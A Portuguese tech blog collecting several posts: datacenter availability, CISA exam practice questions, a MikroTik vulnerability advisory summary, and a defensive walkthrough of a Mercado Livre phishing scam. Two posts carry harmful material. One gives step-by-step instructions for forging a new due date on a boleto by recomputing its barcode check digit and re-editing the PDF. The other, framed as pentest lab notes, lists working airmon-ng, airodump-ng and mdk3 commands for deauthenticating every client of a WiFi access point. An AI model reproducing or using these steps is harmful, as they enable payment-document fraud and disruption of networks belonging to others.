domingo, 10 de março de 2019

Disponibilidade em Datacenters

Por Thiago Alvarenga



DISPONIBILIDADE EM DATACENTERS


O que é o gerenciamento da disponibilidade?

Gerir a disponibilidade significa implementar políticas de redundância para assegurar que todos os recursos tecnológicos sejam preservados afim de garantir a continuidade do negócio. Deste modo, a capacidade de um serviço, componente ou item está em consonância às necessidades sob o plano de disponibilidade do site e em detrimento deste plano ele pode conter ações reativas e proativas para assegurar que a disponibilidade possa exceder às expectativas atuais ou futura. Intrínseco a este plano de disponibilidade, ele aborda às demandas, o suporte às determinadas áreas do negócio, os aspectos que impliquem em indisponibilidade (incidentes e problemas) assim como os critérios de desempenho e capacidade.

Conceitos Básicos


·         Disponibilidade – capacidade em atender funções esperadas, quando necessário, mensurada de forma percentual.
·         Confiabilidade – intervalo de tempo em que o objeto medido funciona sem interrupção. Para bens tangíveis, como dispositivos, medido pelo Mean Time Between Failures - MTBF e para bens intangíveis, como serviços, medido pelo Mean Time Between System Incidents - MTBSI (Uptime).
·         Sustentabilidade – desempenho na restauração após uma falha, sendo medido por MTTR (Mean Time to Repair), ou Downtime.
·         Funcionalidade – capacidade em cumprir níveis acordados para os aspectos de disponibilidade, confiabilidade e sustentabilidade.
·         Resiliência - capacidade de se recuperar ou se adaptar na ocorrência de mudanças, do inesperado ou adversidades (i.e., tolerância a falhas)
·         Defeito – perda das propriedades esperadas. – Ex. perda de capacidade de isolamento de um cabo.
·         Falha – perda da funcionalidade, causada por um defeito. – Ex. perda do isolamento.
·         Falta – efeitos possíveis em consequência de uma falha. – Ex. curto-circuito ou choque.
       ·         DEFEITO -> FALHA -> FALTA  

Cálculo da Disponibilidade

Disponibilidade = (TSA – MTTR / TSA) * 100%


Sistemas de Alta Disponibilidade

Sistema de TIC tolerante a falhas de hardware, software e de suprimento de energia, a fim de torna-lo disponível o máximo de tempo disponível.
Contém redundâncias para reduzir os Single Points of Failure – SPOF, impossibilitando que uma única falha comprometa o funcionamento de todo o sistema. Ex: Clusters.
Sistemas Dual-Node – a duplicação dos elementos pode oferecer:


  • Redundância – ativo/ativo
  • Balanceamento de carga – ativo/ativo com cargas parciais;
  • Hot Standby – ativo/passivo, com ativação automática.
  • Níveis de alta disponibilidade: vai de 95% que corresponde a um downtime de 18 dias e 6h por ano, até 99,999% que corresponde a um downtime de 5 minutos por ano.
  • Disponibilidade contínua – preservação de um sistema ou serviço continuamente disponível, sem falhas.


Sistema de Informações de Disponibilidade

Conjunto de ferramentas e atividades que apoiam a realização do processo de gestão da disponibilidade.
Atividades concernentes às responsabilidades da gestão de disponibilidade:
Atividades Reativas – monitoramento e análise das medições, gerando relatórios de disponibilidade, que mostram as falhas (indisponibilidades ou não atendimento a métricas), para investigação de causas e ações de contorno.

Atividades Proativas – a partir dos relatórios de disponibilidade, pode-se avaliar riscos com dados operacionais concretos, possibilitando o planejamento de serviços novos, a revisão e a alteração de serviços de produção, o desenvolvimento de mecanismos de resiliência e a implantação de contramedidas a um custo que seja justificável. Seu principal produto é a concepção dos planos de disponibilidade.

Um componente essencial para alimentação de um sistema de informações de disponibilidade são os diferentes pontos de contato com os usuários, uma vez que servem para a entrada de incidentes e problemas que impactam na disponibilidade (Call Center, Help Desk e Service Desk).
Outras definições importantes:


  • Incidente: evento que não é parte da operação padrão e afeta a qualidade.
  • Problema: é uma causa desconhecida de um ou mais incidentes que afetam a normalidade dos serviços.
  • Erro conhecido: envolve o diagnóstico da causa e a potencial aplicação da solução de contorno.


Disponibilidade e nível de serviço

Os Acordos de Nível de Serviço (ANS), também conhecidos comumente por SLA (Service Level Agreement) são artefatos escritos, podendo ou não ser na forma de um contrato legalmente estabelecido, ou ainda ser parte de um contrato mais amplo, que celebra um pacto entre um provedor e um cliente, definindo metas para o serviço a ser prestado e as responsabilidades de ambas as partes.
Um ANS gera expectativas consistentes sobre a qualidade da prestação de um serviço de TI.
A disponibilidade é um indicador chave de desempenho a ser contemplado em um ANS, sendo a sua gestão indispensável para que este acordo seja devidamente cumprido.
A estrutura de um ANS pode ser baseada em:

Serviços: abrange todos os clientes de um serviço.

  • Cliente: abrange todos os serviços contratados por um cliente.


  • Multinível:  Corporativo: abrange todos os assuntos genéricos.  Cliente: abrange todos os assuntos que são relevantes a um grupo específico de clientes ou unidades de negócios.  Serviço: abrange todos os assuntos que são relevantes a um serviço específico para um cliente específico.


quinta-feira, 14 de fevereiro de 2019

CERTIFICAÇÃO CISA - CISSP


Grande esforço! Não importa a sua pontuação, a preparação correta da ISACA ®  irá ajudá-lo a se destacar em seu CISA ®  exame e mover sua carreira para a frente.

Desloque-se para os seus resultados detalhados.
Lembre-se: estas perguntas são uma pequena prévia do que você pode esperar no dia do exame.
O exame oficial CISA tem 150 perguntas.


Você está a poucos passos de distância da obtenção de sua certificação CISA:
1. Prep para o exame.
2. registrar e pagar para o seu exame.
3. Programe o seu exame.
4. Ace no exame CISA.

1
Um regulamento de auditoria deve:
A sua resposta: D. delinear a autoridade geral, o escopo e as responsabilidades da função de auditoria.
EXPLICAÇÃO : Uma Carta de Auditoria deve indicar objetivos da administração para e delegação de autoridade para Contas.

2
Um auditor de SI encontra um pequeno número de pedidos de acesso do usuário que não tinham sido autorizadas pelos gestores através das etapas de fluxo de trabalho predefinidos normais e regras de escalonamento. O auditor de SI deve:
CORRETO RESPOSTA: A. realizar uma análise adicional.
EXPLICAÇÃO : O auditor de SI deve primeiro determinar a causa raiz e impacto dos resultados e não tem informações suficientes para recomendar que fixa os problemas de fluxo de trabalho.

3
Um auditor de SI observa que uma empresa terceirizou desenvolvimento de software para um terceiro que é uma empresa startup. Para garantir que o investimento da empresa em software é protegido, qual dos seguintes deve ser recomendado pelo auditor de SI?
CORRETO RESPOSTA: C. Deve haver um acordo de depósito código fonte no lugar.
EXPLICAÇÃO : Enquanto uma auditoria trimestral das instalações de fornecedores é uma boa prática, não garantir a disponibilidade do código-fonte em caso de falha do fornecedor start-up.

4
O apetite de risco de uma empresa é  melhor estabelecida por:
CORRETO RESPOSTA: D. comité de direcção.
EXPLICAÇÃO : A equipa de gestão de segurança está preocupado com a gestão da postura de segurança, mas não com a determinação da postura.

5
Ao identificar um tempo de conclusão do projeto anterior, que deve ser obtido mediante o pagamento de um prémio para a conclusão inicial, as atividades que devem ser selecionados são aqueles:
CORRETO RESPOSTA: B. que ter zero tempo de folga.
EXPLICAÇÃO : O caminho crítico é o tempo de duração mais longa das actividades, mas não se baseia no tempo mais longo de qualquer actividade individual.

6
Um auditor de SI é atribuído a auditar um projeto de desenvolvimento de software, que é mais de 80 por cento concluída, mas já invadida tempo em 10 por cento e os custos em 25 por cento. Qual das seguintes ações deve o auditor tomar?
CORRETO RESPOSTA: D. Reveja a condução do projeto e o business case.
EXPLICAÇÃO : Não há nenhuma indicação de que o gerente de projeto deve ser alterado sem olhar para as razões para a superação.

7
Um programador modificado maliciosamente um programa de produção para alterar os dados e, em seguida, restaurado o código original. Qual dos seguintes iria  MAIS  efetivamente detectar a atividade maliciosa?
CORRETO RESPOSTA: B. Revendo arquivos de log do sistema
EXPLICAÇÃO : Revendo a integridade do código executável e fonte é um controle ineficaz, porque o código fonte foi alterado novamente para o original e vai concordar com o executável atual.

8
Qual dos seguintes seria  melhor  assegurar a continuidade de uma rede de área ampla (WAN) em toda a organização?
A sua resposta: A. Built-in de roteamento alternativo
EXPLICAÇÃO : encaminhamento alternativo seria garantir que a rede continuaria se um dispositivo de comunicação falhar ou se uma ligação é cortada por causa mensagem de reencaminhamento pode ser automática.

9
Um auditor de SI está revendo os controles de um centro de dados de segurança física e percebe várias áreas de preocupação. Qual das seguintes áreas é o  MAIS importante?
CORRETO RESPOSTA: D. A porta de saída de emergência está bloqueado.
EXPLICAÇÃO : O desligamento de emergência questão botão é uma preocupação significativa, mas a segurança de vida é a maior prioridade.

10
Qual das seguintes opções  MELHORES  ajuda os proprietários de informação para classificar corretamente os dados?
SUA RESPOSTA: B. Treinamento em políticas e padrões organizacionais
EXPLICAÇÃO: Ao implementar a classificação de dados, é essencial que as políticas e os padrões organizacionais, incluindo o esquema de classificação de dados, sejam entendidos pelo proprietário ou guardião dos dados para que possam ser classificados adequadamente.


terça-feira, 12 de fevereiro de 2019

COMO ALTERAR VENCIMENTO DE BOLETO MANUALMENTE



Por Thiago Alvarenga

ALTERANDO O VENCIMENTO DE UM BOLETO 

Este artigo tem como objetivo, o de demonstrar um passo a passo para alterar o vencimento de um boleto comum.

É sábio dizer que cada campo de um boleto tem um significado, não cabe este artigo explicá-lo, mas você poderá verificar nos links que serão adicionados ao final deste artigo.


Veja a imagem abaixo:


Observe que os números em vermelho determina o vencimento do boleto, porém, é feito um cálculo matemático sobre este campo. A parte azul identifica o valor do boleto.

Vamos praticar:

PASSO UM:


1 - Copie o código de barras e cole ele no seguinte site: teste boletos


2 - Visite o site acima e altere os campos da data de vencimento acrescentando números adiante ao que está no seu boleto, copie o código de barras e clique no botão para calcular, ele vai dar um erro apontando qual código é o verificador, desta forma basta você alterar e pronto, você tem um código de barras com uma data atual.

Desta forma, basta pegar o boleto original, jogar em um site para converter de pdf para doc do word e colar o novo código de barras e seus respectivos campos, ao concluir, salve o documento em formato de pdf.


Fato que o emissor do boleto receberá este boleto em sua conta, basta saber se ele irá consentir este crédito para o fim que se destina, isto terá que ser acordado previamente.

Fonte:

https://www.google.com/search?q=bacem+c%C3%B3digo+vencimento+boleto&rlz=1C1CHBD_pt-PTBR828BR829&oq=bacem+c%C3%B3digo+vencimento+boleto&aqs=chrome..69i57.9216j0j4&sourceid=chrome&ie=UTF-8

http://www.contadordedias.com.br/

https://gerencianet.com.br/blog/campos-dos-boletos-linha-digitavel/

http://www.socialbits.com.br/software/excel-dicas-praticas-08-verificando-linha-do-codigo-de-barras/

domingo, 10 de fevereiro de 2019

Quebra de Wifi - Aireplay VS MDK3

QUEBRA DE WIFI USANDO O EVIL TIWN ATTACK (LINSET)



Este post descreve uma forma simples em usar métodos auxiliares de um Pentest Wifi, isto ao que tange o uso do Linset ou outra aplicação do gênero. Este poste não visa ensinar a usá-lo, restringe-se apenas em demonstrar uma forma auxiliar para manter os clientes do AP (access point - roteador), desconectado. Também não será explanado nenhum comparativo entre o Aireplay ou MDK3. Vale ressaltar que já existe outros métodos de penetração mais eficiente, mas este ainda é adotado pela sua facilidade e por usar as mesmas técnicas do Pineapple Wifi (Alan Turing).

Para este LAB:
  • Workstation VM
  • Wifislax
  • Dois adaptadores Wifi.

SITUAÇÃO:

Em determinado Pentest, foi detectado uma ineficiência no Aireplay e o MDK3, então foi iniciado outra instância na VM rodando o Wifislax, desta vez para verificar se havia dispositivos conectados no Roteador. 

Com duas instâncias VMs rodando o Wifislax (sistema operacional usado para quebra de wifi), use os seguintes comandos:

PRIMEIRO COMANDO:

1 - Digite: airmon-ng start wlan0

Este comando habilita o modo monitor e cria uma interface comumente denomindada de mon0 você verá a seguinte saída:

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy14]
                                (monitor mode enabled on mon0)

Esta saída representa que o seu adaptador usb wifi está em modo monitor, instalado e pronto para uso.

SEGUNDO COMANDO:

Digite este comando: airodump-ng mon0

Este comando é usado como sniff de rede wifi, necessário para conseguir o MAC, o canal e saber se há clientes conectados na rede wifi.

TERCEIRO COMANDO:

Digite este comando: airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel AA --write AABBZZ mon0

X : é o mac do roteador usado para o pentest

AA: é o canal do respectivo roteador.

AABBZZ: é o nome do arquivo de captura, pode ser visualizado pelo wireshark.

Diante dessas informações, é possível usar Aireplay ou MDK3 para forçar a queda dos clientes ativos no roteador sem fio.

Help Aireplay:

Aireplay-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen


Além do Aireplay, é possível utilizar o MDK3, particularmente, tenho preferência nele.



MDK3

Considerando a forma sucinta, utilizou-se para o fim que se destina este post o comando abaixo:



mdk3 mon0 d -i XX:XX:XX:XX:XX



Onde o xx é o MAC do roteador em questão.

Após digitar o comando, a sua saída estará da seguinte forma:

Disconnecting between: AA:AA:AA:AA:AA:AA and: AA:AA:AA:AA:AA:AA

Onde o xx é o MAC dos clientes (celulares e dispositivos sem fio conectados ao roteador) em questão.

É possível consulta o seu help logo abaixo:

MDK 3.0 v6 - "Yeah, well, whatever"
by ASPj of k2wrlz, using the osdep library from aircrack-ng
And with lots of help from the great aircrack-ng community:
Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
THANK YOU!

MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
IMPORTANT: It is your responsibility to make sure you have permission from the
network owner before running MDK against it.

This code is licenced under the GPLv2

MDK USAGE:
mdk3 <interface> <test_mode> [test_options]

Try mdk3 --fullhelp for all test options
Try mdk3 --help <test_mode> for info about one test only

TEST MODES:
b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.

Por fim, atingimos a finalidade deste post.

quarta-feira, 22 de agosto de 2018

MikroTik RouterOS SMB Buffer Overflow

1. Descrição da Vulnerabilidade

MikroTik, empresa Letã fundada em 1996 para desenvolver roteadores e sistemas ISP sem fio. Atualmente ela fornece hardware e software para conectividade com a Internet na maioria dos países ao redor do mundo. Com sistema operacional independente, O RouterOS, baseado no kernel do Linux v3.3.5, é um sistema embarcado e fechado. 
Um estouro de buffer foi encontrado no serviço Mikrotik RouterOS SMB ao processar mensagens de solicitação de sessão NetBIOS. Há suspeita que esta vulnerabilidade era conhecida pelo comunidade Hacker desde de 2012. Os invasores remotos com acesso ao serviço podem explorar essa vulnerabilidade e obter execução de código no sistema.
O estouro ocorre antes que a autenticação ocorra, portanto, é possível que um invasor remoto não autenticado o explore.

2. Pacotes Vulneráveis

  • Todas as arquiteturas e todos os dispositivos que executam o RouterOS antes das versões 6.41.3 / 6.42rc27

3. Informações do Fornecedor, Soluções e Soluções Alternativas

  • MikroTik lançou a versão 6.41.3 do RouterOS [ 1 ] que corrige o problema relatado.
  • A solução sugerida pelo MikroTik no caso de não ser possível instalar uma atualização consiste em desabilitar o serviço SMB.

4. Créditos

Esta vulnerabilidade foi descoberta e pesquisada por Juan Caillava e Maximiliano Vidal da Core Security Consulting Services. A publicação deste comunicado foi coordenada por Leandro Cuozzo da Equipe de Recomendações Essenciais.

Créditos: 
https://www.cvedetails.com/google-search-results.php?q=mikrotik&sa=Search
https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow
https://www.cvedetails.com/cve/CVE-2018-7445/

domingo, 5 de agosto de 2018

Identificando e Prevendo Fraudes no Mercadolivre

Por: Thiago Alvarenga






Tema: Vendi um notebook, enviei e não recebi o valor do Mercado Livre.

Veio ao meu conhecimento, a notícia de uma fraude usando ML (Mercado Livre). Na situação em tese, foi anunciado um notebook no Mercado Livre e a vítima respondeu a mensagens pelo campo de perguntas e respostas, a fraude aconteceu por que o indivíduo aproveitou de um usuário inexperiente. O ML recomenda que toda transação e tipo de contato seja feita através de sua plataforma, no caso em tela, apesar do ML ter um algorítimo de verificação e uma política rígida para garantir que toda negociação ocorra dentro de sua plataforma. Neste episódio isto não ocorreu.

Etapas até a finalização da FRAUDE:

1. A vendedor anunciou o produto.

2. Um suposto comprador com  cadastro ativo no Mercado Livre postou a seguinte mensagem: 

Olá,, ainda esta disponivel este Aparelho ?? Se tiver completo com tudo funcionando em perfeitas condiçoes normalmente eu fico com ele, poderia me mandar algumas fotos para mostrar e tirar algumas duvidass??? dvdalx18 (a) gemeio, cm (subilinhado e grifado para melhor interpretação) aguardo o retorno, At

3. O vendedor motivado em interagir e garantir a venda, vale frisar que por falta de experiência, identificou que o negrito era um email (dvdalx18@gmail.com) e enviou mais fotos. 


4. O Vendedor recebe no dia seguinte, uma suposta informação que o seu produto fora vendido com sucesso. 



Email falso - Figura 1


Neste passo, é sábio atentar-se que há vários erros de concordância, o texto não tem vírgulas para separar as orações. 


5. Após trocar emails com o suposto comprador, o vendedor envia o produto para o endereço do comprador.

ANÁLISE DA FRAUDE

1. É necessário atentar-se para detalhes básicos, isto impedirá que fatos como estes não ocorram mais. 

"Assegure que você esteja fazendo uma negociação pela internet em um site cuja o domínio esteja hospedado no brasil, terminado em (.br). Por exemplo". 


2. Antes de negociar qualquer coisa na internet, procure saber pelo menos o que é um domínio, para que serve e o que significa cada parte dele, tenha certeza de usar uma internet confiável para digitar senhas de banco, procure sempre as páginas com o ícone de um cadeado na barra de endereço do navegador ou o https.



Em vias normais e básicas, o domínio da internet é um nome dado em um espaço dentro da internet, fazendo uma analogia, é o mesmo que alugar uma casa. 

O que identifica uma casa no espaço que nos cerca?

O seu terreno localizado geograficamente, assim como o domínio está localizado geograficamente dentro da internet vinculado à empresa que fora contratada.

Alguém pode perguntar o que é uma casa?

A casa é uma edificação, com localização geográfica, usada para abrigar pessoas, objetos com finalidades de moradia ou comerciais. 

E alguém pode perguntar, o que é um domínio?

Em termos práticos, é um pedaço de espaço adquirido na internet, usado para abrigar dados digitais na internet, com finalidades comerciais ou pessoais.

Como pode ser visto, um domínio poder identificado sob este ponto de vista. Assim como uma casa precisa ser comprada, um domínio também; Assim como uma casa precisa ser mobiliada, um domínio também precisa ser hospedado, ou seja, ter um localização no mundo virtual cuja esta o domínio é registrado e várias páginas (conteúdo) moldam as suas características. Dentro do domínio ainda existe os subdomínios, é o mesmo que construir outra casa formando um sobrado ou edifício. 

Nesse sentido, por mais que você comprou e pagou uma casa, é necessário pagar os impostos ao governo, caso contrário, ela não será mais sua. Isto posto, em um domínio também acontece isso, e cada empresa que vende o domínio poderá colocá-lo a venda novamente na falta de pagamento. Vale salientar que domínio pode ser registrado por um ou mais anos. 

Exemplo de um domínio, subdomínio e páginas:

domínio:
minhacasa.com.br
  
subdomínio:
casa2.minhacasa.br

Páginas:
minhacasa.com.br/contato.html

casa2.minhacasa.com.br/contato.html

O texto antes do (.) é denominado de subdomínio e tudo que está após a barra ( / ) representa páginas de internet. 

Agora surge uma dúvida, alguém precisa enviar uma correspondência para uma suposta residência e para que isto ocorra, é imprescindível que a pessoa tenha em mãos o CEP.  Invertendo as situações, surge a necessidade de enviar uma mensagem para o um domínio (uma empresa com o domínio registrado ou pessoa), ela precisará saber o nome da pessoa e respectivamente, o seu domínio. Como evidenciado, um email está associado ao domínio. para o domínio sugerido neste artigo como ficaria?

Simples: meu-mail@minhacasa.com.br

Ademais, saiba que um domínio também pode ser expressado da seguinte forma: 

minha-casa.com.br

Veja que em ambos os exemplos, cada domínio é único e só pode existi um dono, então caso alguém já tenha registrado, não é possível outra pessoa registrar. Isto é óbvio, mas muitas pessoas acabam esquecendo deste detalhe. 

Agora que o tema "domínio" é um assunto mais tranquilo para atender, há outros fatores para se preocupar. 

Neste raciocínio, seguindo a analogia da casa, alguém pode pintar uma casa igual a sua, colocar o mesmo portão e janelas, número da casa e fachada comercial, tudo isto para confundir e aplicar golpes. Tratando-se de uma casa comercial, um desavisado pode acabar fechando um negócio em uma empresa de fachada e sair prejudicado, por isto, antes de fechar algum tipo de negócio, é preciso checar o CNPJ para saber se a empresa em questão está no local adequado e se outros fatores sócio econômicos condizem com a empresa em questão. 

Voltando ao tema do "domínio", o mesmo ocorreu no caso deste artigo, por um descuido, a vítima confundiu-se e não soube distinguir os conceitos básicos de um domínio e precisar sobre a sua propriedade. Ademais, a Figura 1 deste artigo, está indicando um domínio com o mesmo nome do Mercado Livre, entretanto, com os desdobramentos dos fatos a seguir, verás que esta informação não é verdadeira.


Domínio Falso do Mercado Livre - Figura 2



Observe que o sublinhado em vermelho denota um domínio que tem o mesmo nome e características para atrair a confiança de sua vítima. Atente-se que nos parágrafos anteriores foi explanado de forma análoga, que é possível alguém pintar uma casa, usar a faxada igual a uma casa comercial de confiança passando-se por uma empresa idônea, induzindo o ao erro. Destarte, há meios para coibir este tipo de conduta, melhor dizendo, não cair nesta ou outras armadilha. Veja a seguir: 

O domínio falso: mercadolivre-suportecomprador.com   

Como saber se este domínio é verdadeiro?

Simples, acesso o site  a seguir ou busque no google por: find whois

No exemplo abaixo será feito usando o site: http://whois.domaintools.com

Ao informar o site falso, foi retornado a seguinte mensagem: 


Consulta Whois - Figura 3


Observando e analisando campo a campo: 

Campo - 1
Descreve os dados da empresa responsável em registrar o domínio, neste caso o Google. Será que o Google falsificou o um domínio? Claro que não! Isto Demonstra que o Google apenas serviu para registrar o domínio que futuramente seria utilizado para a prática do crime. 

Campo - 2
Descreve que o domínio foi registrado e encontra-se devidamente ativo, funcional. 


Campo - 3 
Descreve a data  que o registro foi feito, ou seja, a data que o registro foi pago e adquirido pelo Google, ou seja, em 13 de Junho de 2018 com validade de um ano. 


Campo - 4 
Descreve para o local onde está sendo apontado os servidores de email e hospedagem, neste caso, os próprios servidores da Google. Tal servidores podem ser de locais diferentes, o uol, locaweb e outros, por exemplo. 


Campo - 5 
Este campo seria o campo com os dados da empresa, neste caso os dados de endereço do mercado livre e outros dados de pessoa jurídica. 

Agora, será mostrado os dados de uma consulta à pagina do mercadolivre para que seja comparada. 


Consulta whois válida do mercadolivre - Figura 4
                             

Um domínio válido retornará informações diferenciadas ao domínio falso.  

Campo - 0 e Campo - 1
Demonstra os dados da propriedade do site, assim como a ultima alteração feita no mesmo. 

Campo - 2
Descreve a razão social do site, ou seja, o nome informado na junta comercial na abertura da filial aqui no Brasil. 


Campo - 3
Informa os dados dos servidores de email e domínio, onde eles estão hospedados que neste caso, no próprio domínio do Mercadolivre.

Campo - 4
Descreve a data de criação do site e quando precisará renovar.


Campo - 5
Informa os dados do administrador que registrou essas informações, normalmente, empresas de grande porte deixa o email do Gestor de TI.


Na figura 5 abaixo é mostrado um email com válido com o domínio válido, exemplo que pode ser usado como base quando uma venda for finalizada.



Email exemplo enviado pelo ML em uma venda - Figura 5


Sendo assim, pode ser constatado que não é difícil buscar informações e evitar futuras dores de cabeça. 

Disponibilidade em Datacenters

Por Thiago Alvarenga DISPONIBILIDADE EM DATACENTERS O que é o gerenciamento da disponibilidade? Gerir a disponibilidade s...